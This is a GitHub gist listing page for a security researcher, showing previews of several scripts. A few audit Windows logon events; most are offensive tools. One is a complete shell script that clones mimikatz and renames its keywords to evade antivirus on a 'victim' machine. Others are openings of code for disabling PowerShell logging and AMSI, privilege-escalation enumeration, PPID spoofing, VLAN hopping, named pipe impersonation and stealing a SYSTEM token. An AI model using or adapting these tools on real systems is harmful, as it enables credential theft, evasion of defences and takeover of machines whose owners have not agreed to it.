Skip to content

Instantly share code, notes, and snippets.

View S3cur3Th1sSh1t's full-sized avatar

S3cur3Th1sSh1t

3k followers · 171 following
View GitHub Profile
@S3cur3Th1sSh1t
S3cur3Th1sSh1t / LastLogons.ps1
Created May 27, 2020 13:49
$Days = 1
$events = @()
$events += Get-WinEvent -FilterHashtable @{
LogName='Security'
Id=@(4800,4801)
StartTime=(Get-Date).AddDays(-$Days)
}
$events += Get-WinEvent -FilterHashtable @{
LogName='System'
Id=@(7000,7001)
@S3cur3Th1sSh1t
S3cur3Th1sSh1t / DC_Logons.ps1
Created May 27, 2020 13:34
DC-LogonEvents
# Find DC list from Active Directory
$DCs = Get-ADDomainController -Filter *
# Define time for report (default is 1 day)
$startDate = (get-date).AddDays(-1)
# Store successful logon events from security logs with the specified dates and workstation/IP in an array
foreach ($DC in $DCs){
$slogonevents = Get-Eventlog -LogName Security -ComputerName $DC.Hostname -after $startDate | where {$_.eventID -eq 4624 }}
@S3cur3Th1sSh1t
S3cur3Th1sSh1t / mimikatz_obfuscator.sh
Last active October 22, 2023 13:34 — forked from imaibou/mimikatz_obfuscator.sh
Mimikatz Obfuscator
# This script downloads and slightly "obfuscates" the mimikatz project.
# Most AV solutions block mimikatz based on certain keywords in the binary like "mimikatz", "gentilkiwi", "benjamin@gentilkiwi.com" ...,
# so removing them from the project before compiling gets us past most of the AV solutions.
# We can even go further and change some functionality keywords like "sekurlsa", "logonpasswords", "lsadump", "minidump", "pth" ....,
# but this needs adapting to the doc, so it has not been done, try it if your victim's AV still detects mimikatz after this program.
git clone https://github.com/gentilkiwi/mimikatz.git windows
mv windows/mimikatz windows/candycrush
find windows/ -type f -print0 | xargs -0 sed -i 's/mimikatz/candycrush/g'
find windows/ -type f -print0 | xargs -0 sed -i 's/MIMIKATZ/CANDYCRUSH/g'
@S3cur3Th1sSh1t
S3cur3Th1sSh1t / LogonEvents.ps1
Created April 28, 2020 16:58
Clear-Host
$user = $null
$date = $null
$computer = $null
$Computer = Read-Host "Computername?"
$isonline = Test-Connection $Computer -Count 1 -ErrorAction SilentlyContinue
$date = (get-date).AddDays(-100) #choose number of days to go back
if($isonline){
@S3cur3Th1sSh1t
S3cur3Th1sSh1t / DisAblePSLogging.cs
Created April 13, 2020 11:33
using System;
using System.Management.Automation;
using System.Reflection;
namespace PSLoggingBypass
{
/*
One of the many ways one could disabled PS logging/AMSI if there's prior code execution.
Author: Lee Christensen (@tifkin_)
@S3cur3Th1sSh1t
S3cur3Th1sSh1t / Invoke-winPEAS.ps1
Created April 8, 2020 13:10
winPEAS in powershell
function Invoke-winPEAS
{
[CmdletBinding()]
Param (
[Parameter(Position = 0, Mandatory = $true)]
[ValidateNotNullorEmpty()]
[String]
$Command
)
@S3cur3Th1sSh1t
S3cur3Th1sSh1t / Run-SecurePS.ps1
Created March 31, 2020 11:03
function Run-SecurePS
{
Param
(
[string]
$argument
)
$PPIDSpoofBlock = @"
@S3cur3Th1sSh1t
S3cur3Th1sSh1t / VLANHopperDTP.py
Created March 31, 2020 08:48
#!/usr/bin/python
#
# This script is performing DTP Trunk mode detection and VLAN Hopping
# attack automatically, running sniffer afterwards to collect any other
# VLAN available.
#
# This script works best in Unix/Linux environment as the script utilizes
# following applications:
# - 8021q.ko
@S3cur3Th1sSh1t
S3cur3Th1sSh1t / NamedPipeImpersonation.cs
Created March 30, 2020 12:31
using System;
using System.IO;
using System.Text;
using System.IO.Pipes;
using System.Threading;
using System.Diagnostics;
using System.Security.Principal;
using System.Security.AccessControl;
using System.Runtime.InteropServices;
using System.ComponentModel;
@S3cur3Th1sSh1t
S3cur3Th1sSh1t / WinlogonSYSTEM.cpp
Last active February 27, 2022 15:34
#include <windows.h>
#include <iostream>
#include <Lmcons.h>
#include <cstdio>
#include <tlhelp32.h>
BOOL SetPrivilege(
HANDLE hToken, // access token handle
LPCTSTR lpszPrivilege, // name of privilege to enable/disable
BOOL bEnablePrivilege // to enable or disable privilege